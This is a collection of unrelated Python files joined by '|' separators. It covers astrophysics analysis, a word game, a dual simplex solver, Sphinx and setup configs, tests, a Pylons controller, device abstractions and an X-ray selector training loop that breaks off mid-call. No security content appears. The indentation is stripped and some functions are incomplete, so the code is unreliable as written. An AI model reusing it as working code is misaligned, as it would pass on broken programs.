import numpy as np
from scipy import integrate
snap_sfr, lbtime, bsize = sfr(context) # compute the global star formation history using the star particles
dset = context.s["mass"].flatten() # load stellar mass dset
mstar_tot = dset["mass"].in_units("Msol").sum()
integrated_mstar = integrate.trapz(snap_sfr, lbtime) # integrate over history of the Universe
print mstar_tot, integrated_mstar
# Assert the integrated star formation history is close to the total stellar mass
assert(np.allclose(mstar_tot, integrated_mstar, rtol=1e-1)), "Error: Integrated stellar mass not close to actual."
print "Passed"
########################################## CDM ##########################################
def splatter_projection_extensive(context):
'''
Make a projection of the desired (extensive) field using the splatter engine
'''
from seren3.analysis.visualization import engines
# this is a lot easier
field = "mass"
# the engine sets the operator and unit for us
engine = engines.SplatterEngine(context.d, field) # dark matter - context.d
camera = context.camera() # the camera object specifying the region we want to image
# We can make a higher resolution image by modifying the map_max_size param of our camera object
# this should be a power of 2
camera.map_max_size = 2048
projection = engine.process(camera)
# this function takes args such as colormap etc if you desire.
# just run help(projection.save_plot()) to see available options
im = projection.save_plot()
im.show() # show the plot
def splatter_projection_extensive_simple(context):
'''
There is a shortcut for simple projections on the Family object
'''
from seren3.analysis.visualization import EngineMode # enum that lets us choose projection mode
projection = context.d.projection("mass", mode=EngineMode.SPLATTER)
im = projection.save_plot()
im.show() # show the plot
def rhoc_cic(context):
'''
Performs CIC interpolation to compute CDM density on the simulation coarse grid in units
kg/m^3
'''
import numpy as np
from seren3.utils.cython import cic
from seren3.utils import deconvolve_cic
unit_l = context.array(context.info["unit_length"]) # the code unit length
dset = context.d["pos"].flatten() # load the dset
x,y,z = dset["pos"].in_units(unit_l).T # separate positions into x,y,z (in code length units)
x = np.ascontiguousarray(x); y = np.ascontiguousarray(y); z = np.ascontiguousarray(z) # cic requires c contiguous arrays
npart = len(x)
N = 2**context.info['levelmin']
L = context.info['boxlen'] # box units
# Perform CIC interpolation. This supports OpenMP threading if OMP_NUM_THREADS env var is set
rho = np.zeros(N**3) # init empty grid
cic.cic(x,y,z,npart,L,N,rho) # do the CIC. openmp enabled, set env. var OMP_NUM_THREADS
rho = rho.reshape((N, N, N))
# Deconvolve CIC kernel
print "Deconvolving CIC kernel"
rho = deconvolve_cic(rho, N) # deconvolve the CIC kernel to recover small-scale power
print "Done"
# Compute units
boxmass = context.quantities.box_mass(species='cdm').in_units("kg") # total box mass
pm_mass = boxmass/npart # particle mass
boxsize = context.array(context.info['unit_length']).in_units('m')
dx = boxsize/N # cell width at levelmin
rhoc_unit = pm_mass/dx**3
rho *= rhoc_unit
# Low-level C I/O routines assemble data as a contiguous, C-ordered (nvars, twotondim, ngrids) numpy.ndarray
# Swap data => shape : (ngrids, twotondim, nvars)
####### WARNING : must keep C-ordered contiguity !!! #######
return np.ascontiguousarray(np.swapaxes(rho, 0, 2))
def deltac_cic(context, rhoc=None):
'''
Returns CDM overdensity field
'''
from seren3.cosmology import rho_mean_z
cosmo = context.cosmo # get the cosmological context - this is a dictionary
omega0 = cosmo['omega_M_0'] - cosmo['omega_b_0'] # CDM density param.
rho_mean = rho_mean_z(omega0, **cosmo) # mean (CDM) density at this redshift
if (rhoc is None):
rhoc = rhoc_cic(context)
delta = (rhoc - rho_mean) / rho_mean # the CDM overdensity
return delta |
from functools import reduce
import math
import random
##################
### Dictionary ###
##################
wordsFile = open("words.txt", "r")
dictionary = []
for line in wordsFile:
stripped_line = line.strip()
lowercaseWord = stripped_line.lower()
dictionary.append(lowercaseWord)
wordsFile.close()
###############
### Letters ###
###############
letters = {"A": 7, "B": 3, "C": 4, "D": 5, "E": 8, "F": 3, "G": 3, "H": 3, "I": 7, "J": 1, "K": 2, "L": 5, "M": 5,
"N": 5, "O": 7, "P": 3, "Qu": 1, "R": 5, "S": 6, "T": 5, "U": 5, "V": 1, "W": 2, "X": 1, "Y": 2, "Z": 1}
# returns true if the word played is valid and false otherwise
def isValid(listOfLetters):
word = reduce(lambda x, y: x + y, listOfLetters)
word = word.lower()
return word in dictionary
# add regex or similar for proper noun checking
# calculates the score of a word once its played and returns it as an integer
def score(listOfLetters):
total = 0
if len(listOfLetters) == 7:
total += 20
for letter in listOfLetters:
total += letter.square.height + 2
return total
# need to add intersections of words
# gets new
def getNewLetter(dic):
index = weightedPick(dic)
def weightedPick(dic):
r = random.uniform(0, sum(dic.itervalues()))
s = 0.0
for k, w in dic.iteritems():
s += w
if r < s: return k
return k
|
from __future__ import division
from ..lab1.Solver import Solver
from ..lab2.SimplexMethod import get_basis_matrix, get_cannonical_form, get_basis_cost_vector
from sympy import zeros, Matrix
from sympy.functions import transpose
import bisect
class DualSimplexMethod(object):
"""
:type matrix_c:Matrix
:type matrix_A:Matrix
:type matrix_b:Matrix
:type precision:float
"""
def __init__(self, matrix_c, matrix_A, matrix_b, precision, condition_operators=None):
self.matrix_c = matrix_c
self._matrix_A = matrix_A
self.matrix_b = matrix_b
self.precision = precision
self.m, self.n = matrix_A.shape
if condition_operators is None:
self.condition_operators = ["="] * self.m
else:
self.condition_operators = condition_operators
self.solver = Solver(self.precision)
def solve(self, basis_indexes_set, maximize, vector_y=None):
"""
:type basis_indexes_set: list[int]
:type not_basis_indexes_set: list[int]
"""
self._matrix_A, self.matrix_c = get_cannonical_form(self._matrix_A, self.condition_operators, self.matrix_c, maximize)
self.m, self.n=self._matrix_A.shape
basis_indexes_set.sort()
not_basis_indexes_set = sorted(set(range(self.n)) - set(basis_indexes_set))
if vector_y is None:
vector_y=transpose(get_basis_cost_vector(basis_indexes_set, self.matrix_c))*get_basis_matrix(basis_indexes_set, self._matrix_A).inv()
vector_kaplan=zeros(self.m+self.n, 1)
for j in not_basis_indexes_set:
vector_kaplan[j, 0]=(vector_y*self._matrix_A[:, j])[0,0]-self.matrix_c[j, 0]
return self.dual_simplex_algorithm(basis_indexes_set, not_basis_indexes_set, vector_kaplan)
def dual_simplex_algorithm(self, basis_indexes_set, not_basis_indexes_set, vector_kaplan):
"""
:type basis_indexes_set: list[int]
:type not_basis_indexes_set: list[int]
"""
basis_matrix = zeros(self.m, len(basis_indexes_set))
for i, j in enumerate(basis_indexes_set):
basis_matrix[:, i] = self._matrix_A[:, j]
inverse_basis_matrix = basis_matrix.inv()
while True:
vector_kappa = inverse_basis_matrix * self.matrix_b
for j in range(vector_kappa.shape[0]):
if vector_kappa[j, 0] < 0:
break
else:
basis_plan = zeros(self.n, 1)
for i, j in enumerate(basis_indexes_set):
basis_plan[j, 0] = vector_kappa[i, 0]
return basis_plan, basis_indexes_set
for k, j in enumerate(basis_indexes_set):
if vector_kappa[k, 0] < 0:
vector_mu = zeros(self.n, 1)
vector_sigma = []
for j_nb in not_basis_indexes_set:
vector_mu[j_nb, 0] = inverse_basis_matrix[k, :] * self._matrix_A[:, j_nb]
if vector_mu[j_nb, 0] < 0:
vector_sigma.append(-vector_kaplan[j_nb, 0] / vector_mu[j_nb, 0])
else:
vector_sigma.append(None)
min_sigma_index = 0
min_sigma = vector_sigma[0]
for i, sigma in enumerate(vector_sigma):
if sigma is None:
continue
elif min_sigma is None or sigma < min_sigma:
min_sigma = sigma
min_sigma_index = i
if min_sigma is None:
raise Exception("Limitations of direct task are incompatible")
min_sigma_index = not_basis_indexes_set[min_sigma_index]
basis_indexes_set.pop(k)
bisect.insort_left(basis_indexes_set, min_sigma_index)
not_basis_indexes_set.remove(min_sigma_index)
bisect.insort_left(not_basis_indexes_set, j)
vector_kaplan[min_sigma_index, 0]=0
for j_nb in not_basis_indexes_set:
vector_kaplan[j_nb, 0]=vector_kaplan[j_nb, 0]+min_sigma*vector_mu[j_nb, 0]
vector_kaplan[j] = min_sigma
inverse_basis_matrix = get_basis_matrix(basis_indexes_set, self._matrix_A)
break
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
from pprint import pprint
sys.path.insert(0, os.path.abspath("../"))
# -- Project information -----------------------------------------------------
project = "PhyloMAF"
copyright = "2021, Farid Musa"
author = "Farid Musa"
# The full version, including alpha/beta/rc tags
release = "1.0"
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx_rtd_theme",
"sphinx.ext.autodoc",
"sphinx.ext.viewcode",
"sphinx.ext.doctest",
"sphinx.ext.napoleon",
"sphinx.ext.intersphinx",
"sphinx.ext.autosummary",
"sphinx.ext.extlinks",
"sphinx.ext.autosectionlabel",
"sphinx.ext.coverage",
"sphinx_git",
"sphinx-prompt",
"sphinx_copybutton",
"hoverxref.extension",
"sphinxcontrib.bibtex",
]
#Coverage Configs
coverage_show_missing_items = True
# Napoleon Configs
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_init_with_doc = False
napoleon_use_param = True
napoleon_use_ivar = True
# InterSphinx Configs
intersphinx_mapping = {
"biom": ("https://biom-format.org/", None),
"pandas": ("https://pandas.pydata.org/docs/", None),
"numpy": ("https://numpy.org/doc/stable/", None),
"python": ("https://docs.python.org/3/", None),
"skbio": ("http://scikit-bio.org/docs/latest/", None),
"ete3": ("http://etetoolkit.org/docs/latest/", None),
}
# Autosummary Configs
autosummary_generate = True
autosummary_generate_overwrite = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = [
"_build",
"Thumbs.db",
".DS_Store",
"_templates/autosummary/*.rst",
"_extensions/**"
]
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
# html_theme = "alabaster"
html_theme = "sphinx_rtd_theme"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = "PhyloMAF - Phylogenetic Microbiome Analysis Framework"
# A shorter title for the navigation bar. Default is the same as html_title.
html_short_title = "PhyloMAF documentation"
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = "favicon.ico"
# If false, no module index is generated.
html_use_modindex = True
# Output file base name for HTML help builder.
htmlhelp_basename = "PhyloMAF-doc"
# The name of an image file (relative to this directory) to place at the top of
# the title page.
latex_logo = "phylomaf_logo.png"
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = False
# This config enables processing of __init__ docstrings
autoclass_content = "both"
# Group members
autodoc_member_order = "groupwise"
# Autodoc Typehints
autodoc_typehints = "description"
# Configurations for sphinx-hoverxref
hoverxref_role_types = {
"hoverxref": "modal",
"ref": "modal", # for hoverxref_auto_ref config
"confval": "tooltip", # for custom object
"mod": "tooltip", # for Python Sphinx Domain
"class": "tooltip", # for Python Sphinx Domain
}
# Bibtex Configuration
bibtex_bibfiles = ["refs.bib"]
# Autosectionlabel configs
autosectionlabel_maxdepth = 1
autosectionlabel_prefix_document = True
# RTD Theme Configs
html_theme_options = {"titles_only": True, "prev_next_buttons_location": "both"}
def skip_member(app, what, name, obj, skip, options):
if what == "attribute":
if name in ["DATABASE_NAME", "INVALID_TAXA", "SEQ_EXTRACT_METHODS"]:
return True
elif what == 'method':
if name.startswith('_'):
return True
return None
def setup(app):
app.connect("autodoc-skip-member", skip_member)
|
"""
Idempotent API for managing supervisor processes
"""
from __future__ import with_statement
from fabtools.files import watch
from fabtools.supervisor import *
def process(name, **kwargs):
"""
Require a supervisor process
"""
from fabtools import require
require.deb.package('supervisor')
require.service.started('supervisor')
# Set default parameters
params = {}
params.update(kwargs)
params.setdefault('autorestart', 'true')
params.setdefault('redirect_stderr', 'true')
# Build config file from parameters
lines = []
lines.append('[program:%(name)s]' % locals())
for key, value in sorted(params.items()):
lines.append("%s=%s" % (key, value))
# Upload config file
filename = '/etc/supervisor/conf.d/%(name)s.conf' % locals()
with watch(filename, True, reload_config):
require.file(filename, contents='\n'.join(lines), use_sudo=True)
# Start the process if needed
if process_status(name) == 'STOPPED':
start_process(name)
|
"""Support for building sinan, bootstraping it on a new version of erlang"""
import sys
import os
import commands
from optparse import OptionParser
class BuildError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
ERTS_VERSION = "5.6.3"
BUILD_PATH = "_build/development/apps/%s/ebin"
ERLWARE_PATH = "/usr/local/erlware"
ERLC = "erlc +debug_info "
LOCAL_APPS = [("etask", "0.5.0"),
("sinan", "0.11.0.2"),
("sinan_web_api", "0.1.0.5")]
ERLWARE_APPS = ["fconf-0.3.0.0",
"ktuo-0.4.0.1",
"crary-0.2.3",
"eunit-2.0",
"cryptographic-0.2.1",
"ewlib-0.8.2.0",
"ewrepo-0.19.0.0",
"gas-6.1.1",
"kernel-2.12.3",
"ibrowse-1.4",
"uri-0.2.0",
"sgte-0.7.1",
"gtime-0.9.4",
"asn1-1.5.2"]
def generate_local_path(app):
ebin = "_build/development/apps/%s-%s/ebin" % (app[0], app[1])
include = "_build/development/apps/%s-%s/include" % (app[0], app[1])
if not os.path.isdir(ebin):
raise BuildError(ebin + " is not a directory")
return " -pa %s -I %s " % (ebin, include)
def generate_erlware_path(path):
ebin = "%s/packages/%s/lib/%s/ebin" % (ERLWARE_PATH, ERTS_VERSION, path)
include = "%s/packages/%s/lib/%s/include" % (ERLWARE_PATH, ERTS_VERSION, path)
if not os.path.isdir(ebin):
raise BuildError(ebin + " is not a directory")
return " -pa %s -I %s " % (ebin, include)
|
# -*- encoding: utf-8 -*-
# (C) Copyright 2008 Tarek Ziadé <tarek@ziade.org>
#
from os.path import join
import os
import logging
from routes.util import redirect_to
from yap.lib.base import *
from atomisator.main.config import AtomisatorConfig
from pylons import request
root = os.path.split(os.path.dirname(__file__))[0]
CONFIG = join(root, 'atomisator.cfg')
log = logging.getLogger(__name__)
class BackofficeController(BaseController):
def _get_values(self, parser):
rss = dict(parser.outputs)['rss']
file_ = rss[0]
if len(rss) > 1:
link = rss[1]
else:
link = ''
if len(rss) > 2:
title = rss[2]
else:
title = ''
if len(rss) > 3:
description = rss[3]
else:
description = ''
return file_, link, title, description
def _set_values(self, parser, file_, link, title, description):
parser.outputs = [('rss', (file_, link, title, description))]
def index(self):
c.title = 'Backoffice'
parser = AtomisatorConfig(CONFIG)
c.atomisator = {}
# getting parameters for the rss output
file_, link, title, description = self._get_values(parser)
c.atomisator['title'] = title
s = [s[0] + ' ' + ' '.join(s[1])
for s in parser.sources]
c.atomisator['sources'] = '\n'.join(s)
c.atomisator['database'] = parser.database
c.atomisator['description'] = description
c.atomisator['link'] = link
s = [s[0] + ' ' + ' '.join(s[1])
for s in parser.filters]
c.atomisator['filters'] = '\n'.join(s)
s = [s[0] + ' ' + ' '.join(s[1])
for s in parser.enhancers]
c.atomisator['enhancers'] = '\n'.join(s)
return render('/backoffice.mako')
def update(self):
parser = AtomisatorConfig(CONFIG)
# getting parameters for the rss output
file_, link, title, description = self._get_values(parser)
# TODO make atomisator cfg file read/writeable by text
# to avoid all this crappy parsing
_get = request.GET.get
title = _get('title', title)
link = _get('link', link)
description = _get('description', description)
self._set_values(parser, file_, link, title, description)
parser.database = _get('database', parser.database)
current = ['%s %s'.strip() % (p[0], ' '.join(p[1]))
for p in parser.filters]
filters = _get('filters', '\n'.join(current))
filters = [f for f in [s.strip()
for s in filters.split('\n')] if f != '']
filters = [(u[0], tuple(u[1:]))
for u in [f.split() for f in filters]]
if filters != parser.filters:
parser.filters = filters
current = ['%s %s'.strip() % (p[0], ' '.join(p[1]))
for p in parser.enhancers]
enhancers = _get('enhancers', '\n'.join(current))
enhancers = [f for f in [s.strip()
for s in enhancers.split('\n')]
if f != '']
enhancers = [(u[0], tuple(u[1:]))
for u in [f.split() for f in enhancers]]
if enhancers != parser.enhancers:
parser.enhancers = enhancers
current = ['%s %s'.strip() % (p[0], ' '.join(p[1]))
for p in parser.sources]
sources = _get('sources', '\n'.join(current))
sources = [f for f in
[s.strip() for s in sources.split('\n')]
if f != '']
sources = [(u[0], tuple(u[1:])) for u in [f.split() for f in sources]]
parser.sources = sources
parser.write()
redirect_to(action='index')
|
import unittest
import os
import json
from vscodenv import extensions_json
class TestExtensionsJson(unittest.TestCase):
def setUp(self):
self.not_exist_json_path = "not_exist_extensions.json"
self.json_path = "extensions.json"
self.json_key = "required"
self.json_values = ['extension-1', 'extension-2']
json_content = '{"recommendations":["extension-0"], "%s":["%s", "%s"]}' % (self.json_key, self.json_values[0], self.json_values[1])
with open(self.json_path, "w") as json_file:
json_file.write(json_content)
self.malformed_json_path = "malformed_extensions.json"
malformed_json_content = '{"%s:"%s", "%s"]}' % (self.json_key, self.json_values[0], self.json_values[1])
with open(self.malformed_json_path, "w") as json_file:
json_file.write(malformed_json_content)
def test_parse_json_should_return_values(self):
ret = extensions_json._parse_json(self.json_path, self.json_key)
self.assertCountEqual(ret, self.json_values)
def test_parse_json_should_return_empty_if_malformed(self):
ret = extensions_json._parse_json(self.malformed_json_path, self.json_key)
self.assertEqual(ret, [])
def test_parse_json_should_return_empty_if_file_not_exists(self):
json_path = "path_does_not_exist"
key = "required"
ret = extensions_json._parse_json(json_path, key)
self.assertEqual(ret, [])
def test_parse_json_should_return_empty_if_key_not_exists(self):
key = "key_not_exist"
ret = extensions_json._parse_json(self.json_path, key)
self.assertEqual(ret, [])
def test_extend_list_json_should_extend_json_values(self):
values = ['extension-1', 'extension-3', 'extension-4']
result = self.json_values[:]
for value in values:
if value not in result:
result.append(value)
extensions_json._extend_list_json(self.json_path, self.json_key, values)
with open(self.json_path) as file_json:
data = json.load(file_json)
json_values = data[self.json_key]
self.assertCountEqual(json_values, result)
def test_extend_list_json_should_create_new_file_if_not_exists(self):
values = ['extension-1', 'extension-3', 'extension-4']
extensions_json._extend_list_json(self.not_exist_json_path, self.json_key, values)
with open(self.not_exist_json_path) as file_json:
data = json.load(file_json)
json_values = data[self.json_key]
self.assertCountEqual(json_values, values)
def tearDown(self):
try:
os.remove(self.json_path)
os.remove(self.malformed_json_path)
os.remove(self.not_exist_json_path)
except IOError:
pass
if __name__ == '__main__':
unittest.main() |
from unittest.mock import patch
import pytest
from rocketpy import Environment, SolidMotor, Rocket, Flight
@patch("matplotlib.pyplot.show")
def test_motor(mock_show):
example_motor = SolidMotor(
thrustSource="data/motors/Cesaroni_M1670.eng",
burnOut=3.9,
grainNumber=5,
grainSeparation=5 / 1000,
grainDensity=1815,
grainOuterRadius=33 / 1000,
grainInitialInnerRadius=15 / 1000,
grainInitialHeight=120 / 1000,
nozzleRadius=33 / 1000,
throatRadius=11 / 1000,
interpolationMethod="linear",
)
assert example_motor.allInfo() == None
|
from datetime import datetime
class RSSEntry:
def __init__(
self,
title: str = None,
link: str = None,
id: str = None,
summary: str = None,
published: str = None,
author: str = None,
media_keywords: str = None,
media_image: str = None):
self.title = title
self.link = link
self.id = id
self.published = published
self.summary = summary
self.author = author
self.media_keywords = media_keywords
self.media_image = media_image
|
#!/usr/bin/env python
# whatlastgenre
# Improves genre metadata of audio files
# based on tags from various music sites.
#
# Copyright (c) 2012-2020 YetAnotherNerd
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""whatlastgenre setup"""
import os
from setuptools import setup
from wlg import __version__
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name='whatlastgenre',
version=__version__,
license='MIT',
url='http://github.com/YetAnotherNerd/whatlastgenre',
description=('Improves genre metadata of audio files '
'based on tags from various music sites.'),
long_description=read('README.md'),
packages=['wlg'],
package_data={'wlg': ['data/genres.txt', 'data/tags.txt']},
entry_points={
'console_scripts': [
'whatlastgenre = wlg.whatlastgenre:main'
]
},
install_requires=['mutagen', 'requests'],
tests_requires=['pytest'],
extras_require={
'discogs': ['rauth'],
'reqcache': ['requests-cache'],
},
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Topic :: Multimedia :: Sound/Audio',
'Topic :: Utilities'
]
)
|
from util import connect
import time
QUERY_5 = '''
select
round(avg(price), 2)
from
listings
where
neighbourhood = :entry;
'''
def main():
neighbourhood = input("Specify the neighbourhood: ")
task5(neighbourhood)
def task5(neighbourhood: str):
connection = connect()
cursor = connection.cursor()
t_start = time.process_time()
cursor.execute(QUERY_5, {
"entry": neighbourhood
})
t_taken = time.process_time()-t_start
rows = cursor.fetchall()
if len(rows):
print("Average rental cost per night for", neighbourhood+" is:")
for row in rows:
print("$"+"".join(map(str, row)))
else:
print(neighbourhood+" Does not exist in database")
connection.commit()
connection.close()
print("Total time taken: {}s".format(t_taken))
return rows
if __name__ == "__main__":
main()
|
# Copyright (c) 2019 Dantali0n
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
from threading import Condition
from typing import Type
from typing import TypeVar
from oslo_log import log
from radloggerpy import config
from radloggerpy._i18n import _
from radloggerpy.database.objects.device import DeviceObject
from radloggerpy.datastructures.device_data_buffer import DeviceDataBuffer
from radloggerpy.device.device_state_machine import DeviceStateMachine
from radloggerpy.types.device_states import DeviceStates
from radloggerpy.types.device_types import DeviceTypes
LOG = log.getLogger(__name__)
CONF = config.CONF
class Device(metaclass=abc.ABCMeta):
"""Abstract class all radiation monitoring devices should implement"""
NAME = "Device"
"""Each radiation monitoring device should have a unique name"""
INTERFACE = None
"""Each radiation monitoring device should use a specific interface"""
TYPE = DeviceTypes.UNDEFINED
"""Each radiation monitoring device should define its type"""
_U = TypeVar('_U', bound=DeviceObject)
"""Bound to :py:class:`radloggerpy.database.objects.device.DeviceObject`"""
def __init__(self, info: Type[_U], condition: Condition):
self.condition = condition
self.info = info
self.data = DeviceDataBuffer(self.condition)
self._statemachine = DeviceStateMachine()
@abc.abstractmethod
def _init(self):
"""Method to perform device initialization
Devices are allowed to clear any flags or variables set when stop() was
called previously inside of this method.
"""
@abc.abstractmethod
def _run(self):
"""Method to be called to run continuously in its own thread
Devices should not return from this method unless the intent is for the
device to stop retrieving data. Data can be gathered by either polling
or using events / wait if the external system supports to do so.
Timers may also be used, please be sure to honor:
CONF.devices.minimal_polling_delay
"""
def run(self):
"""Entry point for devices to initialize and start running
Serves as the entry point for devices and calls _init and _run. In
addition handles any required state transitions
Any exception encountered will be raised so DeviceManager can handle it
appropriately.
"""
if self._statemachine.get_state() is DeviceStates.ERROR:
"Recover device from error state"
LOG.info(_("Restarting {} device of implementation {} from "
"previous error state.")
.format(self.info.name, self.info.implementation))
self._statemachine.reset_state()
elif self._statemachine.get_state() is not DeviceStates.STOPPED:
"Not logging a message here, DeviceManager can easily do that"
raise RuntimeError(_("Can not start same device {} multiple times")
.format(self.info.name))
try:
self._statemachine.transition(DeviceStates.INITIALIZING)
self._init()
except Exception:
self._statemachine.transition(DeviceStates.ERROR)
raise
try:
self._statemachine.transition(DeviceStates.RUNNING)
self._run()
except Exception:
self._statemachine.transition(DeviceStates.ERROR)
raise
if self._statemachine.get_state() is DeviceStates.RUNNING:
self._statemachine.transition(DeviceStates.STOPPED)
@abc.abstractmethod
def stop(self):
"""Method when called that should halt operation of device asap
Halting can be achieved by setting a variable and checking this
variable inside a loop in the _run method. Other methods include using
conditions to notify the _run method.
"""
@abc.abstractmethod
def is_stopping(self):
"""Should return true if in the progress of stopping false otherwise
:return: True if stopping, false otherwise
"""
def get_state(self):
"""Return the current statemachine state"""
return self._statemachine.get_state()
def has_data(self):
"""Wrapper around internal buffer"""
return self.data.has_readings()
def get_data(self):
"""Return a collection of radiation monitoring data if any is available
Retrieves the currently stored collection of radiation monitoring data
and subsequently clears it.
:return: Collection of RadiationReading objects
:rtype: List of :py:class: '~.RadiationReading' instances
"""
got_data = self.data.fetch_clear_readings()
if got_data:
return got_data
else:
LOG.error(_("Unable to retrieve data for: %s") % self.NAME)
return []
|
#!/usr/bin/env python
from distutils.core import setup
import setuptools
setup(name='McComplex',
version='1.0',
description="""This program reconstructs macrocomplexes of protein-protein
and protein-(DNA/RNA) from a list of files of binary interactions of its chains""",
author='Maria Lucía Romero, Ferran Pegenaute, Ipek Yaren',
author_email='ferran.pegenaute01@estudiant.upf.edu',
long_description=open('README.md').read(),
install_requires=['biopython >= 1.73.0','argparse >= 1.1.0', 'pysimplelog'],
packages=['McComplex', 'McComplex.functions'],
license='LICENSE.txt',
url='https://github.com/ferranpgp/McCrocomplex')
|
# encoding: utf-8
'''
@author: xupengfei
'''
from row_factory import keyed_tuple_factory
from utils import LoggingMixin
class BaseDumper(LoggingMixin):
_row_factory = staticmethod(keyed_tuple_factory)
def __init__(self, handler_factories, *args, **kwargs):
self.handler_factories = handler_factories
self.handlers = None
@property
def row_factory(self):
return self._row_factory
@row_factory.setter
def row_factory(self, factory):
self._row_factory = factory
def create_handlers(self, **kwargs):
handlers = [hf.create_handler(**kwargs) for hf in self.handler_factories]
return handlers
|
import os
import time
import argparse
import numpy as np
import torch
import torch.nn as nn
from utils import sample_once, collate_fn, evaluate, random_baseline
from sklearn.metrics import roc_auc_score
from constants import *
from datasets.random_task_dataset import RandomTaskDataset
from models.lstm_selector import LSTMSelector
from models.predictor import meanPred
def train_model(train_ld, val_ld, predictor, selector, save_path, num_epochs, lr, k):
"""Train the selector model.
Args:
train_ld (dataloader): dataloader for the meta-train set
val_ld (dataloader): dataloader for the meta-val set
predictor (nn.Module): the predictor module
selector (nn.Module): the trainable selector module
save_path (string): path to save checkpoints
num_epochs (int): number of epochs
lr (float): learning rate
k (int): number of X-rays to select from pool
"""
optimizer = torch.optim.Adam(selector.parameters(), lr=lr)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
selector = selector.to(device)
selector.train()
ssidx = 0
seidx = 515 if USE_ASL else 512 # End Index of Pool for Selector
begin_time = time.time()
report_examples = 0
report_reward = 0
best_metric = None
print('begin selector training K=%d' % k)
for epoch in range(num_epochs):
if epoch == 2: #multiply learning rate by 0.1
for g in optimizer.param_groups:
g['lr'] = g['lr'] * 0.1
#auroc = evaluate(val_ld, selector, predictor, device, k)
#print("Meta-val average AUROC: %.4f" % auroc)
for i, data in enumerate(train_ld):
optimizer.zero_grad()
pool = data['pool'].numpy()
pool_labels = data['pool_labels'].numpy()
data['pool'] = data['pool'].to(device)
logits = selector(data['pool'][:,:,ssidx:seidx])
idx, log_prob = sample_once(logits, k) #(batch_size, k)
selected = []
selected_labels = []
for p in range(len(idx)):
selected.append(pool[p][idx[p]])
selected_labels.append(pool_labels[p][idx[p]])
selected = torch.Tensor(np.array(selected))
selected_labels = torch.LongTensor(np.array(selected_labels))
preds = predictor.forward_selected(selected[:,:,:512], selected_labels, data['query'][:,:,:512], data['query_labels'])
preds = preds.squeeze(dim=2) #(batch_size, query_set_size)
res = np.array([0]*data['query_labels'].shape[0]).astype(float) #(batch_size,)
for p in range(data['query_labels'].shape[0]):
res[p] = roc_auc_score(data['query_labels'][p,:],preds[p,:])
main_reward = torch.Tensor(res)
baseline_reward = random_baseline(data, predictor, k)
reward = main_reward - baseline_reward #(batch_size,)
reward = reward.to(device)
final = -(reward * log_prob) #(batch_size,)
final = torch.mean(final)
final.backward()
optimizer.step()
report_reward += main_reward.mean()
report_examples += 1
if (i+1) % 5 == 0:
print('epoch %d, iter %d, avg_reward %.3f, time_elapsed %.3f sec' % (epoch+1, i+1,
report_reward/report_examples,
time.time() - begin_time))
report_reward = 0.0
report_examples = 0
if (i+1) % 30 == 0:
auroc, _ = evaluate(val_ld, selector, predictor, device, k, return_avg=True)
print("Meta-val average AUROC: %.4f" % auroc)
if best_metric is None or auroc > best_metric: #new best network
print("saving new best network!\n")
best_metric = auroc
path = os.path.join(save_path, "model_epoch%d_iter%d" % (epoch+1, i+1))
torch.save({'epoch': epoch+1,
'model_state_dict': selector.state_dict(),
'optimizer_state_dict': optimizer.state_dict()},
path)
def load_data(positive_csv_path, normal_csv_path, num_tasks, num_workers=4, deterministic=True):
"""Return a dataloader given positive and normal X-ray data.
Args:
positive_csv_path (string): path to csv containing data for X-ray images that are positive
for abnormalities
normal_csv_path (string): path to csv containing data for X-ray images that are labeled
positive for "No Finding", meaning they are normal
num_tasks (int): number of tasks to sample for this dataset
num_workers (int): number of worker threads to load the data
deterministic (bool): whether the tasks in a dataset are sampled deterministically. If
deterministic, the tasks used are the same across different epochs
Returns:
ld (torch.utils.data.DataLoader): dataloader for the given data
"""
dset = RandomTaskDataset(positive_csv_path=positive_csv_path,
normal_csv_path=normal_csv_path,
unlabeled_pool_size=UNLABELED_POOL_SIZE,
unlabeled_pos_frac=UNLABELED_POS_FRAC,
query_set_size=QUERY_SET_SIZE,
query_pos_frac=QUERY_POS_FRAC,
conditions_used=NON_HOLD_OUT,
num_tasks=num_tasks,
deterministic=deterministic,
use_asl=USE_ASL)
ld = torch.utils.data.DataLoader(dataset=dset,
